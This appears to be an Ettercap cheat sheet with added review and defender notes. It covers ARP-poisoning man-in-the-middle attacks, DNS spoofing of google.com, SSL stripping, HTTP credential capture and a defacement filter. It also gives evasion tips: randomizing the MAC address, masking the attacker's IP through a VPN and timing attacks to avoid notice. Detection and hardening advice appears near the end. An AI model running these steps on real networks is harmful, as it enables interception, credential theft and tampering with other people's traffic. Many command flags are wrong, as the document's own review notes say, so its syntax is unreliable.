# Installing Ettercap. The lines below are per-platform alternatives, not a sequence:
# Debian/Ubuntu (apt), Fedora (dnf), macOS (brew), or a build from source.
sudo apt-get update
sudo apt-get install ettercap-graphical ettercap-common
# Or CLI-only version
sudo apt-get install ettercap-text-only
sudo dnf install ettercap
brew install ettercap
# Source build: this clones the current default branch and installs it as root with no
# integrity check at all. Outside a throwaway lab box, check out a tagged release
# (git checkout <release-tag>) and verify it against the project's published signatures
# or hashes first; whatever is in the tree gets installed with full privileges.
# NOTE(review): upstream's README appears to build out-of-tree (mkdir build && cd build &&
# cmake ..) rather than `cmake .` inside the source directory — confirm against the README.
git clone https://github.com/Ettercap/ettercap.git
cd ettercap
cmake .
make
sudo make install
# UI / run modes.
sudo ettercap -G
# Recommended for interactive MITM attacks and real-time monitoring
# Provides visual interface for target selection and packet inspection
sudo ettercap -T
# Full-featured interactive mode without graphical dependencies
# Better for remote/headless systems
sudo ettercap -q
# Minimal output, useful for scripted deployments
# NOTE(review): ettercap(8) describes -q (--quiet) as a modifier for the console interface
# that suppresses packet contents, not a UI mode of its own; it belongs alongside -T —
# confirm with `ettercap --help`.
ettercap -i eth0 -P list
# List available plugins without launching attacks
sudo ettercap -i list
# Display all network interfaces with details
# NOTE(review): ettercap(8) lists interfaces with -I (--iflist); `-i list` hands the
# literal string "list" to -i as the capture interface name — verify with `ettercap --help`.
sudo ettercap -i eth0
# Target specific interface (eth0, wlan0, etc.)
sudo ettercap -i eth0 -p
# NOTE(review): ettercap(8) documents -p as --nopromisc, i.e. do NOT put the interface
# into promiscuous mode (promiscuous is the default without it); the original note here
# said the opposite — verify with `ettercap --help` before relying on this flag.
sudo ettercap -i eth0 -T -n
# N = scan for hosts, then exit
# Use before selecting targets
# NOTE(review): -n is documented as --netmask <NETMASK> and takes an argument; no
# scan-and-exit option appears in ettercap(8) — confirm with `ettercap --help`.
# Command line: -t <IP>/CIDR
# NOTE(review): -t and -e are not documented as target/exclusion selectors in ettercap(8)
# (-t is --proto, -e is --regex) — verify with `ettercap --help` before relying on the
# three lines below.
sudo ettercap -i eth0 -T -t 192.168.1.5
# Target single IP address
# Syntax: IP1,IP2,IP3 or IP/mask
sudo ettercap -i eth0 -T -t 192.168.1.0/24
# Target entire subnet
sudo ettercap -i eth0 -T -t 192.168.1.5 -e "192.168.1.1,192.168.1.10"
# Attack range but exclude specific IPs
# ARP-poisoning MITM variants. All of them rewrite the ARP caches of the named hosts,
# which is the signal the arp_cop plugin and the detection notes later on this page
# key on (duplicate IP->MAC advertisements, ARP volume); it is not a silent technique.
# NOTE(review): ettercap(8)'s documented -M arp arguments do not include "unified" or
# "bridged" (those names match the sniffing modes) — verify with `ettercap --help`.
sudo ettercap -i eth0 -T -M arp:unified /192.168.1.100/ /192.168.1.1/
# Attacker -> Target -> Gateway
# Intercept traffic from single host through gateway
# Syntax: /victim_IP/ /gateway_IP/
sudo ettercap -i eth0 -T -M arp:bridged /192.168.1.100/ /192.168.1.200/
# Intercept traffic between two hosts
# Useful for peer-to-peer communication interception
sudo ettercap -i eth0 -T -M arp:remote /192.168.1.5/ /10.0.0.5/
# Intercept traffic between hosts on different subnets
# GUI: Mitm → ARP poisoning → Sniff remote connections
# Automatically rejects ARP requests to maintain connection
# Edit etter.dns file (typically /etc/ettercap/etter.dns)
# Format: pattern A|PTR|AAAA spoofed_IP
# This file is read by the dns_spoof plugin; answers are forged for names matching these
# patterns. From the client side the forgery shows up as a mismatch between what the
# victim resolves (the nslookup check at the end of this page) and an independent resolver.
# Redirect all google.com requests to attacker
google.com A 192.168.1.10
www.google.com A 192.168.1.10
*.google.com A 192.168.1.10
# IPv6 spoofing
# (::ffff:c0a8:010a is the IPv4-mapped form of 192.168.1.10, i.e. the same host as above)
example.com AAAA ::ffff:c0a8:010a
# Reverse DNS (PTR)
1.1.1.1 PTR attacker.local
sudo ettercap -i eth0 -T -M arp:unified -P dns_spoof /192.168.1.5/ /192.168.1.1/
# Requires -P dns_spoof plugin and configured etter.dns
sudo ettercap -i eth0 -T -P dns_spoof -c /path/to/custom.dns
# Specify non-default DNS spoof configuration
# NOTE(review): ettercap(8) does not document a -c option — confirm with `ettercap --help`
# before relying on this line.
sudo ettercap -i eth0 -T -P sslstrip /192.168.1.5/ /192.168.1.1/
# Downgrades HTTPS to HTTP during interception
# Requires ARP poisoning to work
sudo ettercap -i eth0 -T -M arp:unified -P sslstrip /192.168.1.5/ /192.168.1.1/
# Full MITM with SSL downgrade
# Intercept content after SSL stripping
# Modify HTTP responses during downgrade
# Defender note: the downgrade only works for sites the browser is still willing to load
# over plain HTTP; HSTS (especially preloaded) and certificate pinning — the "Enforce HTTPS
# with HSTS headers" / "certificate pinning" items at the end of this page — close that window.
sudo ettercap -i eth0 -T -L all.pcap
# Log all captured traffic to pcap file
# -L flag enables logging mode
# NOTE(review): per ettercap(8), -L <LOGFILE> writes ettercap's own log format
# (<LOGFILE>.ecp / .eci, read back with etterlog), not pcap; pcap output is -w <PCAPFILE>.
# Name the output for what it is so the tcpdump/wireshark steps later open the right file.
sudo ettercap -i eth0 -T -F "tcp.dst.port == 443"
# Apply filter: only capture HTTPS traffic
# NOTE(review): -F takes a filter file compiled with etterfilter (the myfilter.filter
# example further down); an inline expression like this is treated as a filename —
# verify with `ettercap --help`.
# Port-based filtering
# NOTE(review): the expressions in this list use a Wireshark/tshark display-filter style
# (`proto == TCP`, `ip.dst in`, `http.uri contains`), not etterfilter's grammar as used by
# the myfilter.ef example below (`ip.proto == TCP`, `DATA.data`). Treat them as a reference
# for reading captures in Wireshark rather than as something ettercap's -F accepts —
# verify against etterfilter(8).
tcp.dst.port == 80 # Destination port 80
tcp.src.port == 443 # Source port 443
# Protocol filtering
proto == TCP # TCP only
proto == UDP # UDP only
proto == ICMP # ICMP only
# IP filtering
ip.src == 192.168.1.5 # Source IP
ip.dst == 8.8.8.8 # Destination IP
ip.dst in 192.168.1.0/24 # CIDR range
# HTTP-specific
http.request == 1 # HTTP requests only
http.uri contains "login" # URI pattern matching
sudo ettercap -i eth0 -T -L captured.pcap -F "tcp.dst.port == 80"
# Capture and filter simultaneously
# NOTE(review): per ettercap(8), -L writes ettercap's .ecp/.eci log files rather than pcap
# and -F expects a filter file compiled with etterfilter, so this line as written does not
# produce a pcap named captured.pcap — confirm with `ettercap --help`.
# File: myfilter.ef
# Format: simple scripting language for packet manipulation
# Compiled with etterfilter (below) and loaded into ettercap with -F.
# search() only gates on the packet containing "User-Agent"; replace() then substitutes the
# exact literal "User-Agent: Mozilla", so a packet with some other agent string passes the
# search but is left unchanged.
# NOTE(review): etterfilter(8) names the port fields tcp.dst / tcp.src (no ".port" suffix);
# check the grammar against the man page and the compiler's output before loading this.
if (ip.proto == TCP && tcp.dst.port == 80) {
if (search(DATA.data, "User-Agent")) {
replace("User-Agent: Mozilla", "User-Agent: Ettercap");
msg("Modified User-Agent header");
}
}
# NOTE(review): kill() is documented as terminating the connection (RST), while drop()
# discards only the current packet — confirm which is intended for port 443 here.
if (ip.proto == TCP && tcp.dst.port == 443) {
kill();
}
# Compile the filter script, then load the compiled output with -F.
etterfilter -o myfilter.filter myfilter.ef
# Converts .ef (human-readable) to .filter (bytecode)
sudo ettercap -i eth0 -T -F myfilter.filter
# Uses compiled filter during packet processing
# etterfilter built-in reference (etterfilter(8) is the authoritative list)
# Data inspection
search(DATA.data, "string") # Search in packet data
regex(DATA.data, "pattern") # Regex matching
# Packet modification
replace("old", "new") # Replace string
inject("content") # Inject new content — NOTE(review): documented as taking a filename whose contents are injected; verify
# Flow control
kill() # NOTE(review): documented as terminating the connection (sends RST), not just dropping this packet — verify
drop() # Drop packet
accept() # Allow packet — NOTE(review): not in etterfilter(8)'s documented function list; verify it exists in the installed version
# Plugin loading. (-P list needs no interface; the earlier example runs it without sudo.)
sudo ettercap -P list
# Display all installed plugins with descriptions
sudo ettercap -i eth0 -T -P plugin_name
# Load and execute named plugin
sudo ettercap -i eth0 -T -P plugin1 -P plugin2 -P plugin3
# Load multiple plugins simultaneously
| Plugin | Purpose |
|---|---|
| dns_spoof | DNS spoofing attacks |
| sslstrip | HTTPS downgrade |
| autoadd | Auto-add targets from traffic |
| arp_cop | Detect ARP spoofing |
| chk_poison | Verify ARP poisoning success |
| find_ettercap | Detect other Ettercap instances |
| ettercap_etter | Compatibility plugin |
| finger | Passive OS fingerprinting |
sudo ettercap -P plugin_name -h
# Display plugin-specific help and options
# NOTE(review): -h is ettercap's global --help; ettercap(8) documents no per-plugin help
# switch — confirm what this actually prints with the installed build.
sudo ettercap -i eth0 -T -M arp:unified \
-F "tcp.dst.port == 80" \
-L credentials.pcap \
/192.168.1.100/ /192.168.1.1/
# Capture HTTP traffic from target
# Analyze pcap for unencrypted credentials
# NOTE(review): per ettercap(8), -F expects a filter file compiled by etterfilter and -L
# writes .ecp/.eci (etterlog) files rather than pcap, so as written this neither filters
# on port 80 nor yields a pcap — verify with `ettercap --help`.
# Any credential that shows up in cleartext here is the finding: the fix is the HTTPS/HSTS
# enforcement listed in the defenses section, not just rotating the password.
# Create filter to replace content
# (deface.ef is referenced here but not shown anywhere on this page)
etterfilter -o deface.filter deface.ef
sudo ettercap -i eth0 -T -M arp:unified \
-F deface.filter \
/192.168.1.100/ /192.168.1.1/
sudo ettercap -i eth0 -T \
-M arp:unified \
-P dns_spoof \
/192.168.1.100/ /192.168.1.1/
# Redirect target's DNS requests to attacker IP
# Enable IP forwarding
# sysctl -w changes the running kernel only; the value is reset on reboot.
sudo sysctl -w net.ipv4.ip_forward=1
# Redirect traffic to local proxy
# This NAT rule sends every inbound TCP/80 connection on this host to local port 8080 and
# stays in place after ettercap exits. Nothing on this page starts a listener on 8080.
# When the test is over, remove it with the matching
# `sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080`
# and set ip_forward back to 0; otherwise the host keeps forwarding and redirecting traffic.
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
-j REDIRECT --to-port 8080
# Run Ettercap with ARP poisoning
sudo ettercap -i eth0 -T -M arp:unified /192.168.1.100/ /192.168.1.1/
sudo ettercap -i eth0 -T \
-M arp:unified \
-P sslstrip \
/192.168.1.100/ /192.168.1.1/
# Requires ARP poisoning to intercept traffic
# Operational notes carried over from the original page (MAC randomization, quiet mode,
# VPN, timing). Defender framing: none of these hides the poisoning itself — the duplicate
# IP->MAC advertisements and ARP volume described in the detection section further down
# are on the wire regardless of which MAC or upstream address is used.
sudo macchanger -r eth0
# Randomize MAC address before attacking
# Harder to trace to physical hardware
# Avoid broadcasting identity during ARP poisoning
# Edit etter.conf: set send_arp in appropriate mode
# Clean-up after a test run: restoring the victims' and gateway's ARP caches is what keeps
# an authorized test from turning into an outage. Confirm from a victim that its entry for
# the gateway shows the real gateway MAC again (`arp -a` or `ip neigh`).
# Stop Ettercap (Ctrl+C)
# Send gratuitous ARP to restore normal traffic
# Re-poison gateway with correct MAC if needed
# Manually send correction ARP
# Ensures victims resume normal connectivity
# Route Ettercap traffic through VPN
# Masks attacker IP from upstream logging
# Disable verbose logging in GUI
# Use quiet mode (-q) for minimal indicators
# Avoid generating ICMP/DNS queries from attacker IP
# Time attacks during high network activity
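# --- Detection and mitigation of ARP poisoning / SSL stripping (defender side) ---
# Monitor for multiple MACs advertising same IP
# Excessive ARP traffic on quiet network
# Inconsistent MAC→IP mappings
# Tools: arp-scan, ettercap -P arp_cop
# Use static ARP entries for critical servers
# A static entry pins the gateway on this host only and does nothing for other hosts.
# net-tools `arp -s` entries do not survive a reboot; the iproute2 equivalent is
# `ip neigh replace 192.168.1.1 lladdr aa:bb:cc:dd:ee:ff dev eth0 nud permanent`.
arp -s 192.168.1.1 aa:bb:cc:dd:ee:ff
# Harden ARP handling on Linux.
# Set via sysctl rather than `echo 1 > /proc/...`: with the redirect form the shell opens
# the /proc file as the invoking user, so `sudo echo 1 > ...` fails with permission denied.
# These are runtime-only values; persist them via /etc/sysctl.d if they are to survive a reboot.
# NOTE(review): arp_ignore/arp_announce only constrain how this host answers and sources
# ARP; they do not stop a poisoner from pushing forged replies into other hosts' caches.
# The network-side control is Dynamic ARP Inspection with DHCP snooping on managed switches.
sudo sysctl -w net.ipv4.conf.all.arp_ignore=1
sudo sysctl -w net.ipv4.conf.all.arp_announce=1
# Use ARP monitoring tools: XArp, Arpwatch
# Monitor for unexpected HTTP on ports normally HTTPS
# Check for missing HSTS headers
# Browser warnings about invalid certificates
# Isolate critical systems on separate VLANs
# Restrict ARP traffic between subnets
# (ARP does not cross a router; segmentation helps by shrinking the broadcast domain an
#  attacker on the same segment can poison, not by filtering ARP between subnets.)
# Implement 802.1X port security
# Use VPN for all sensitive traffic
# Enforce HTTPS with HSTS headers
# Use certificate pinning in applications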
sudo ettercap -i eth0 -T -r 100
# Limit packet rate to 100 packets/second
# Reduces network load and detection risk
# NOTE(review): ettercap(8) documents -r as --read <PCAPFILE> (process a capture offline);
# no rate-limit option appears in the documented list, so this would try to open a file
# named "100" — verify with `ettercap --help`.
sudo ettercap -i eth0 -T -S
# Drop to interactive shell during sniffing
# NOTE(review): -S is documented as --nosslmitm (disables ettercap's SSL interception);
# no "drop to shell" option appears in ettercap(8) — verify.
# View captured pcap files
# (tcpdump/wireshark open pcap only; ettercap's -L output is .ecp/.eci and is read with etterlog)
tcpdump -r captured.pcap
wireshark captured.pcap
# Parse specific protocol
strings captured.pcap | grep "password"
# Crude first pass only: case-sensitive, so it misses "Password"/"passwd" and anything non-ASCII.
# Edit /etc/ettercap/etter.conf
# Configure global behavior:
# - ARP poisoning mode
# - Packet timing
# - Plugin paths
# - Logging options
sudo ettercap -i eth0 -T -w /custom/path/etter.conf
# NOTE(review): ettercap(8) documents -w as --write <PCAPFILE> (pcap output), so this line
# would overwrite the config file with a capture rather than load it; the documented
# alternate-config option is -a/--config <CONFIG> — verify with `ettercap --help`.
sudo ettercap -i eth0 -T -6
# Enable IPv6 MITM attacks (experimental)
# NOTE(review): -6 is documented as --ip6scan (ICMPv6 node discovery) — confirm what the
# flag does in the installed build before relying on it.
# Verify IP forwarding enabled
cat /proc/sys/net/ipv4/ip_forward
# Enable if needed
# (runtime-only change; reset on reboot — and remember to set it back to 0 after the test)
sudo sysctl -w net.ipv4.ip_forward=1
# Check gateway reachability
# (ping without -c runs until interrupted on Linux; `ping -c 3 192.168.1.1` when scripting)
ping 192.168.1.1
# Verify interface selection
sudo ettercap -i list
# NOTE(review): interface listing is -I (--iflist) in ettercap(8); `-i list` selects an
# interface literally named "list" — verify with `ettercap --help`.
# Validate filter syntax
# NOTE(review): -d here is presumably etterfilter's debug switch — confirm in etterfilter(8);
# the compiler's error output is what reports grammar problems in the .ef file.
etterfilter -o output.filter input.ef -d
# Check for syntax errors in .ef file
# Review etterfilter man page for grammar
# Verify etter.dns format (spaces, not tabs)
# Ensure pattern matches target's DNS queries
# Check DNS plugin loaded: sudo ettercap -P list
# Test with nslookup from victim machine
# (compare the answer against an independent resolver; a mismatch is the spoofing signal)
nslookup example.com
# Reduce filter complexity
# Enable quiet mode (-q)
# Limit packet capture scope with -F flags
# Use bridged mode instead of unified for better performance